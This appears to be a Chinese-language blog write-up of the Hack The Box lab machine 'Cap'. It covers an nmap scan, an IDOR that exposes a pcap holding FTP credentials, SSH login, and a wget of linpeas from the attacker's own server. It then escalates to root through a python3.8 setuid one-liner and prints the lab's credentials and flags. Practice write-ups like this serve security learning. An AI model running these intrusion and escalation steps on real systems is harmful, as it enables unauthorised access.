Cap

USER FLAG

先用nmap扫一下

1
nmap 10.10.10.245

image-20251223164407720

发现212280端口

先看看80端口的

image-20251223164544068

在这个页面可以看到有下载流量包的地方,但是这个流量包里没有有用信息

不过发现URL中后面跟着的数字,尝试改成0,然后下载

1
http://10.10.10.245/data/0

image-20251223164649107

可以发现登录成功的字段,还有USER、PASS这种用户名密码的,并且是FTP协议

image-20251223165025646

TCP追踪流看一下

image-20251223164928233

可以得到用户名和密码

1
2
USER nathan
PASS Buck3tH4TF0RM3!

尝试利用获取到的用户名和密码去登录22端口,可以登录成功,21端口也可以

1
ssh nathan@10.10.10.245

image-20251223165318714

就能得到第一个flag了

1
1b2266adb9df9cb387059bf5dce75c14

ROOT FLAG

接着就是要进行提权了

在本地开启一个服务

1
php -S 0:80

image-20251223175652436

image-20251223175443451

利用wget命令将linpeas传到靶机服务器上,并给可执行权限

linpeas工具:https://github.com/peass-ng/PEASS-ng/releases

image-20251223175839903

1
2
wget http://10.10.16.65/linpeas.sh
chmod +x linpeas.sh

image-20251223175734812

image-20251223175929742

可以扫到能利用python3.8进行提权

https://gtfobins.github.io/gtfobins/python/

image-20251223180107908

直接获取root权限,并读取root flag

1
2
python3.8 -c 'import os; os.setuid(0); os.system("/bin/sh")'
cat /root/root.txt

image-20251223180153735

1
55d64e20218c50e05d7910d66ab8752c

Cap
https://yschen20.github.io/2025/12/23/Cap/
作者
Suzen
发布于
2025年12月23日
更新于
2025年12月23日
许可协议